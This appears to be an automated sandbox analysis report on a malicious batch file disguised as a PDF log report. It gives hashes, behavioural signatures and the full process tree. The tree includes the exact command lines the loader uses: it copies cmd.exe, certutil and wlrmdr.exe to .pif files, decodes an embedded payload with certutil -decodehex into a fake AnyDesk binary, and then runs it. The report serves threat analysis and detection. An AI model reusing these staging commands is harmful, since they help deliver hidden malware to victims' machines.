Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/01/2025, 06:25
Static task
static1
Behavioral task
behavioral1
Sample
MT Lesley CT.rar
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
MT Lesley CT.rar
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
MF-HF malfunction LOG Report,PDF.cmd
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
MF-HF malfunction LOG Report,PDF.cmd
Resource
win10v2004-20241007-en
General
-
Target
MF-HF malfunction LOG Report,PDF.cmd
-
Size
2.7MB
-
MD5
52c4a6ab8615c5f10087756a5506a81d
-
SHA1
4edc7261d4b1f624d94099071e5752fbc5864fae
-
SHA256
b7aa6671b0d47e966e51c97c069edff139d312e7707ffbc22fb2392b3004021a
-
SHA512
b542b3b361dac98ac1db9517aeac1bfec3dab4f3439729f466a225550e1c0b486bf662989bc15f51d25842fedca09087105bd81a48a13a9632f0167375ce39ef
-
SSDEEP
24576:ybei0ej3l3KRE+5WyHCN51BPTjF0Sj2dkucbo0063u9wN6UFfbDXRCDy:ybeiJjERE+q51SdvmYUz
Malware Config
Signatures
-
Executes dropped EXE 5 IoCs
pid Process 1580 alpha.pif 536 phf.pif 2736 alpha.pif 2876 phf.pif 2612 awpha.pif -
Loads dropped DLL 5 IoCs
pid Process 2688 cmd.exe 1580 alpha.pif 2688 cmd.exe 2736 alpha.pif 2688 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2628 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2628 PING.EXE -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2612 awpha.pif 2612 awpha.pif 2612 awpha.pif 2612 awpha.pif -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 2612 awpha.pif 2612 awpha.pif 2612 awpha.pif 2612 awpha.pif -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2688 wrote to memory of 2324 2688 cmd.exe 32 PID 2688 wrote to memory of 2324 2688 cmd.exe 32 PID 2688 wrote to memory of 2324 2688 cmd.exe 32 PID 2688 wrote to memory of 2284 2688 cmd.exe 33 PID 2688 wrote to memory of 2284 2688 cmd.exe 33 PID 2688 wrote to memory of 2284 2688 cmd.exe 33 PID 2688 wrote to memory of 3048 2688 cmd.exe 34 PID 2688 wrote to memory of 3048 2688 cmd.exe 34 PID 2688 wrote to memory of 3048 2688 cmd.exe 34 PID 2688 wrote to memory of 1580 2688 cmd.exe 35 PID 2688 wrote to memory of 1580 2688 cmd.exe 35 PID 2688 wrote to memory of 1580 2688 cmd.exe 35 PID 1580 wrote to memory of 536 1580 alpha.pif 36 PID 1580 wrote to memory of 536 1580 alpha.pif 36 PID 1580 wrote to memory of 536 1580 alpha.pif 36 PID 2688 wrote to memory of 2736 2688 cmd.exe 37 PID 2688 wrote to memory of 2736 2688 cmd.exe 37 PID 2688 wrote to memory of 2736 2688 cmd.exe 37 PID 2736 wrote to memory of 2876 2736 alpha.pif 38 PID 2736 wrote to memory of 2876 2736 alpha.pif 38 PID 2736 wrote to memory of 2876 2736 alpha.pif 38 PID 2688 wrote to memory of 2612 2688 cmd.exe 39 PID 2688 wrote to memory of 2612 2688 cmd.exe 39 PID 2688 wrote to memory of 2612 2688 cmd.exe 39 PID 2688 wrote to memory of 2628 2688 cmd.exe 40 PID 2688 wrote to memory of 2628 2688 cmd.exe 40 PID 2688 wrote to memory of 2628 2688 cmd.exe 40
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"2⤵PID:2324
-
-
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"2⤵PID:2284
-
-
C:\Windows\system32\extrac32.exeextrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"2⤵PID:3048
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Users\Public\phf.pifC:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Admin\AppData\Local\Temp\MF-HF malfunction LOG Report,PDF.cmd" "C:\\Users\\Public\\AnyDesk.avi" 93⤵
- Executes dropped EXE
PID:536
-
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 122⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Public\phf.pifC:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 123⤵
- Executes dropped EXE
PID:2876
-
-
-
C:\Users\Public\awpha.pif"C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2612
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 52⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2628
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD51681b40bf17bbaa119bc15de0178a7f0
SHA14aa764f20cfbcad18a2fd2d6233e80ad6ad8a341
SHA256d61ec9e10804abaf84e4c59f3a9369f27fd25ba6e60ed293dfc82581b2553cda
SHA5126b73ce5d844bfbc9caffc55c3412ed0b87e046c3833b000b14fed7e8b2fa3a6fe951b6d63a5080de65f5d69ad60b8a4d254542ad83233f2bb4ed1471fb6e49f6
-
Filesize
43KB
MD51b79536d9033da4ee3b8b21354dbd391
SHA109b4a38f0a6960768f26ef86a30bc0167e690f50
SHA256385b4553cbef207d9c5e466002940c205d51b1e2095fa8b442de1f64d6512f95
SHA5122475b0352929d87090d92d1d6b2cb3db97632d780bf898c1c44f9169d513752f1ef26df476f9eb8487e75cbdc5c5584e3a4470cfedcea709a39cd82a59c190ae
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e